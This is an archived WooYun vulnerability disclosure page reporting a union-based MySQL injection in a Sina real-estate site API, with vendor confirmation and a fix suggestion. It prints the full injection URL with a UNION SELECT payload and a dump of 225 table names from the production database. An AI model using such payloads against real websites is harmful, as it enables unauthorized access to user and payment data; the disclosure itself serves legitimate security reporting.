当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095008

漏洞标题:新浪又一站点MySQL注射(支持union)

相关厂商:新浪

漏洞作者: lijiejie

提交时间:2015-02-01 13:58

修复时间:2015-03-18 14:00

公开时间:2015-03-18 14:00

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-01: 细节已通知厂商并且等待厂商处理中
2015-02-02: 厂商已经确认,细节仅向厂商公开
2015-02-12: 细节向核心白帽子及相关领域专家公开
2015-02-22: 细节向普通白帽子公开
2015-03-04: 细节向实习白帽子公开
2015-03-18: 细节向公众公开

简要描述:

新浪又一站点MySQL注射(支持union)

详细说明:

注射点:

http://i.house.sina.com.cn:80/api/cities.php?act=get_city_by_province&callback=jQuery18204528277686331421_1422735366633&format=json&province=11 UNION ALL SELECT 1,user(),version(),4,5,6,7,8%23&_=1422735366958


参数province可注入,支持union.

漏洞证明:

sina.com.cn.mysqli_2.png


[*] i_house_sina_com_cn
[*] information_schema
[*] test
Database: i_house_sina_com_cn
[225 tables]
+-----------------------------+
| activity_tj_vnet |
| activity_vplan |
| admin_chongzhi_log |
| admin_compose |
| admin_groups |
| admin_log |
| admin_notice |
| admin_user |
| airticket_action |
| api_access_log |
| api_request_log |
| archive_edm_send_log_2010 |
| archive_edm_send_log_201002 |
| archive_edm_send_log_201003 |
| archive_edm_send_log_201004 |
| archive_edm_send_log_201005 |
| auction_bidlog |
| auction_info |
| auction_news |
| auction_signup |
| auction_topprice |
| black_list |
| bnmf_click_log |
| bnmf_gift |
| bnmf_gift_config |
| bnmf_intention_log |
| bnmf_invite |
| bnmf_invite_bj |
| bnmf_order |
| bnmf_order_bj |
| bnmf_result |
| callcenter_analysis_dialy |
| callcenter_analysis_month |
| callcenter_record |
| callcenter_seat_record |
| callcenter_source_record |
| callcenter_telphone |
| card_manage |
| city2list_ids |
| club_fields |
| club_import |
| club_ls_member |
| club_templates |
| club_user_400 |
| club_user_import_log |
| club_user_info |
| club_user_info_inactive |
| club_user_info_offline |
| club_user_info_offline_bak |
| club_user_online_temp |
| config_city |
| config_city_log |
| data_analyze_log |
| duplicate_cardnumber |
| editor_contacts |
| editor_contacts_feedback |
| editor_contacts_log |
| editor_contacts_photo |
| edm_blacklist |
| edm_category |
| edm_click_log |
| edm_content |
| edm_cron |
| edm_open_log |
| edm_request |
| edm_seed |
| edm_send_log |
| edm_send_quota |
| edm_setting |
| edm_sms_log |
| email_activate_log |
| email_active_log |
| fy_uc_user |
| gift_exchange |
| gift_ext |
| giftexchange_log |
| house_data_baidu |
| industry_data |
| industry_fields |
| industry_import |
| industry_log |
| industry_templates |
| kuba_card |
| login_log |
| member_realty_publication |
| mms_blacklist |
| mms_content |
| mms_cron |
| mms_product |
| mms_send_log |
| mms_template |
| mms_template_title |
| mobile_code |
| nickname_infotobase |
| null_nickname_recode |
| payment_order |
| reg_error_log |
| reg_error_malice_ip |
| reghost_recode |
| sales_manage |
| sales_sendsms_log |
| search_for_base_user |
| search_for_club_user |
| sina_api_log |
| sinaname_mapping |
| sms_blacklist |
| sms_content |
| sms_cron |
| sms_cron_bak |
| sms_log |
| sms_product |
| sms_request |
| sms_send_log |
| sms_send_log_bak |
| sms_subscribe |
| sms_subscribe_report |
| sms_unique |
| sms_whitelist |
| soho_admin_compose |
| soho_admin_controller |
| soho_admin_users |
| soho_kfs |
| soho_log |
| sso_log |
| sso_reg_log |
| sso_uid_mapping |
| stat_all |
| stat_all2 |
| stat_all_set |
| stat_callcenter |
| stat_datause |
| stat_everyday |
| stat_everyday_set |
| stat_userfrom |
| stat_useroffline |
| third_party_login |
| top_house |
| top_house_city |
| tuan_order |
| ump_block_data |
| ump_dictionary |
| ump_dynamic_list |
| ump_export_limit |
| ump_export_log_email |
| ump_export_log_mobile |
| ump_fixed_list |
| ump_import_log |
| ump_import_templates |
| ump_industry_user |
| ump_industry_user_meta |
| ump_list |
| ump_offline_user |
| ump_offline_user_meta |
| urs_admin_groups |
| urs_club_fields |
| urs_club_templates |
| urs_club_user_info_offline |
| urs_edm_request |
| urs_house_contact |
| urs_industry_log |
| urs_mms_request |
| urs_sms_request |
| urs_to_sms_log |
| user_auditing |
| user_base |
| user_base_inactive |
| user_callcenter |
| user_card |
| user_cardnumber |
| user_creditbonus_log |
| user_data_outbound |
| user_data_search |
| user_draw |
| user_esf_callcenter |
| user_focus |
| user_golf |
| user_info |
| user_info_inactive |
| user_intention |
| user_invite_recode |
| user_reflection_0 |
| user_reflection_1 |
| user_reflection_2 |
| user_reflection_3 |
| user_reflection_4 |
| user_reflection_5 |
| user_reflection_6 |
| user_reflection_7 |
| user_reflection_8 |
| user_reflection_9 |
| user_reset_link |
| user_reset_log |
| user_search |
| user_sendlejubi_flag |
| user_service |
| user_sms_activate |
| user_sms_activate_log |
| user_temporary |
| user_temporary_inactive |
| user_upload_record |
| users |
| uss_fields |
| uss_focushouse |
| uss_project |
| uss_project_field |
| uss_user_data |
| uss_user_data_base |
| uss_user_data_extend |
| uss_user_search |
| video_log_fail |
| video_log_suss |
| will_user |
| will_user_0 |
| will_user_1 |
| will_user_2 |
| will_user_3 |
| will_user_4 |
| will_user_5 |
| will_user_6 |
| will_user_7 |
| will_user_8 |
| will_user_9 |
| wpw_active |
| xw_goumaili |
| xw_huoyuedu |
+-----------------------------+

修复方案:

参数过滤

版权声明:转载请注明来源 lijiejie@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-02-02 10:04

厂商回复:

第三方合作业务,已经通知进行整改,感谢对新浪安全的支持

最新状态:

暂无